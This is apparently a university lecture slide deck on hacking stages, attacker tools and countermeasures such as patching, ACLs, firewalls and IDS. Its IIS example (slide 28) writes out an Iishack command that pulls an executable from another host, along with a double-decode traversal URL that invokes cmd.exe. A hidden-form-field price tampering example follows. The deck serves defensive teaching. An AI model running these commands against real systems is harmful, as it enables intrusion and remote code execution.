HACKING and INTRUSION DETECTION MANAGEMENT

1
HACKING and INTRUSION DETECTION MANAGEMENT

• S.Govinda
• University of Mauritius
• mgovinda_at_uom.ac.mu

2
Agenda

• How is Hacking Done?
• Examples of Hacking
• Prevention of Hacking

3
The Enemy is Ignorance

• Observe your enemies, for they first find out
  your faults
• Antisthenes, Athenian Philosoper, 440 BC

4
Hacker methodologies.

• Oxymoron? Not really. There is normally some
  method to this madness.
• Based on systematically exploiting weaknesses in
  your security infrastructures, both physical and
  IT.

5
Steps to Hacking

• Foot printing
• Scanning
• Enumeration
• Gaining Access
• Escalating Privilege
• Pilfering
• Covering Tracking
• Creating Back Doors
• Denial of Service

6
Footprinting

• Objective
• Target Address Ranges, namespace acquisition, and
  information gathering. Very Detailed approach
• Techniques
• Open Source Searches, whois, web interface, DNS
  transfer zones

7
Footprinting cont.

• Tools
• Whois
• http//www.networksolutions.com/whois
• www.arin.net/whois
• DNS Transfer Zones
• Dig
• nslookup is d
• Sam Spade

8
Scanning

• Objective
• Bulk target assessment and identification of
  listening services focuses the attackers
  attention on the most promising avenue.
• Techniques
• Ping Sweeps
• TCP/UDP Port Scans
• OS Detection

9
Scanning Cont.

• Tools
• Ping Sweeps fping, WS_ping Pro Pack
• TCP/UDP port scan nmap, Superscan, fscan
• OS detection Nmap, queso, siphon

10
Enumeration

• Objective
• More intrusive probing now begins as attackers
  begin identifying valid user accounts or poorly
  protected resource shares
• Techniques
• List User Shares
• List File Shares
• Identify Application

11
Enumeration cont.

• Tools
• List User Shares
• Null sessions
• Dumpacl
• Sid2user
• onsite admin
• List File Shares
• Showmount
• legion
• Identify Application
• telnet grabbing

12
Gaining Access

• Objective
• Enough data has been gathered at this point to
  make informed attempt to access target
• Techniques
• Password Eavesdropping
• Password File Grab
• Buffer Overflows

13
Gaining Access cont.

• Tools
• Password Eavesdropping
• tcpdump,
• L0phtcrack
• readsmb
• Password File Grab
• pwdump2
• Buffer Overflows
• Bind
• IIS

14
Escalating Privilege

• Objective
• If only user level access was obtained in the
  last step, the attackers will now seek to gain
  complete control of the system.
• Techniques
• Password Cracking
• Known Exploits

15
Escalating Privilege cont.

• Tools
• Password Cracking
• John
• L0phtcack
• Known Exploits
• Ic_messages
• Getadmin
• sechole

16
Pilfering

• Objective
• The information-gathering process begins again to
  identify mechanisms to gain access to trusted
  systems.
• Techniques
• Evaluate Trusts
• Search for clear text passwords

17
Pilfering cont.

• Tools
• Evaluate Trusts
• Rhosts
• LSA Secrets
• Search for clear text passwords
• User data
• Configuration files
• Registry

18
Covering Tracks

• Objective
• Once ownership of the target is secured, hiding
  this fact from system administrators becomes
  paramount, lest they quickly end the romp.
• Techniques
• Clear Logs
• Hide Tools

19
Covering Tracks cont.

• Tools
• Clear Logs
• Zap
• Event Log GUI
• Hide Tools
• Rootkits
• File streaming

20
Creating Back Doors

• Objective
• Trap doors will be laid in various parts of the
  system to ensure that privileged access is easily
  regained at the whim of the hacker.
• Techniques
• Create rogue user accounts
• Schedule batch jobs
• Infect startup files
• Plant control service

21
Creating Back Doors cont.

• Tools
• Create rouge user accounts
• administrators
• Schedule batch jobs
• Cron
• AT
• Infect startup files
• Start up folder
• Registry
• Plant control service
• Netcat
• Remote.exe
• VNC

22
Denial of Service

• Objective
• If an attacker is unsuccessful in gaining access,
  they may use readily available exploit code to
  disable a target as a last resort.
• Techniques
• SYN flood
• DDos
• ICMP techniques
• Internet Worms

23
Denial of Service cont.

• Tools
• SYN flood
• synk4
• DDos
• trincoo
• ICMP techniques
• Smurf
• Ping of death
• Internet Worms
• Code Red
• I Love You
• Melissa

24
Example 1 IIS web exploit.

• Only requires normal web user access to an IIS
  webserver (i.e. port 80 or 443).
• Using non-standard ports for your web server only
  makes this marginally more difficult.
• Using SSL (https protocol) will not prevent the
  exploit from succeeding.

25
Example 1 Target info.

• Target IP address is 192.168.168.125
• Query whois database at ARIN.net to locate owner
  and domain information.
• Also try reverse DNS mappings for host/domain
  names.

26
Example 1 Services information

• Use nmap to scan target for services of interest.
• nmap -sS -p 21-25,80,135-139,443 192.168.168.125

Starting nmap V. 2.53 by fyodor_at_insecure.org (
www.insecure.org/nmap/ ) Interesting ports on
(192.168.168.125) (The 7 ports scanned but not
shown below are in state closed) Port
State Service 21/tcp open
ftp 80/tcp open http 135/tcp open
loc-srv 139/tcp open
netbios-ssn 443/tcp open https 23/tcp
open telnet Nmap run completed -- 1 IP
address (1 host up) scanned in 1 second
27
Example 1 OS Information

• Nmap p80 o 192.168.168.125
• Uses the open port 80
• -o implies find the Operating System
• Returns OS

28
Example 1 Attacks

• Possible attacks on 192.168.168.125
• ftp/telnet Password Cracking
• Examples
• John
• L0phtcack
• http/https Web defacing / perversion
• Iishack 192.168.168.125 80 172.29.11.101/getem.exe
  
• Use of double decodes
• http//192.168.168.125/scripts/..255c..255cwinnt
  /system32/cmd.exe?/cdirc\
• Denial of Service attacks
• Example Syn Flooding

29
Preventing the attacks

• Apply software patches to the Operating System
• Iishack exploited a defect in IIS 4.0
• Check vendor site e.g ftp//ftp.microsoft.com
• Turn off all unnecessary services
• ftp, telnet
• Use of strong passwords
• Password auditing necessary (Lc3 software)
• Password encryption on networks (kerberos)
• Apply access control lists on routers
• Prevents scanning of network
• Use of firewall
• Hides the true IP address of the server
• Can protect from both internal and external
  attacks
• Use of an Intrusion Detection System
• Effective against Denial of Service Attacks

30
ACLs Access-list 101 deny icmp any any
13 Access-list 101 deny icmp any any 17
Monitoring DOS Attacks
NAT 192.168.168.125 172.22.0.2
INTERNET
Application-Specific Proxy Server
NAT 192.168.168.125 202.60.7.7
ROUTER
IDS
End UserSegment
FIREWALL
DMZ
Public Server Segment
192.168.168.125 Web Server
SECURE CORPORATE INTRANET
Not advertised by firewall over the Internet
192.168.1.12 Corporate IS Server
31
Example 2 Hacking Windows 95/98, Me/XP

• Exploiting File Share

32
Example 2 File Share Counter Measure
33
Example 3 Poor Web Design

• Use of hidden tags in the e-commerce site
• ltFORM ACTIONhttp//192.168.168.125/cgi-bin/order.
  pl methodpostgt
• ltinput typehidden name price value199.99gt
• ltinput typehidden name prd_id valueX190gt
• QUANTITY ltinput typetext namequant size3
  maxlenght3 value1gt
• lt/FORMgt
• Hacker can easily change the value in a Netscape
  composer.
• ltinput typehidden name price value1.99gt

34
Example 4 Spoofed E-mails

• Countermeasure Disable Active X settings

35
Example 4 Hoax Security Alerts
36
Some useful sites

• SANS Institute (www.sans.org)
• Security Focus Archives (www.securityfocus.com)
• Snort IDS home (www.snort.org)
• Security archives (archives.neohapsis.com)
• CERT Coordination Center (www.cert.org)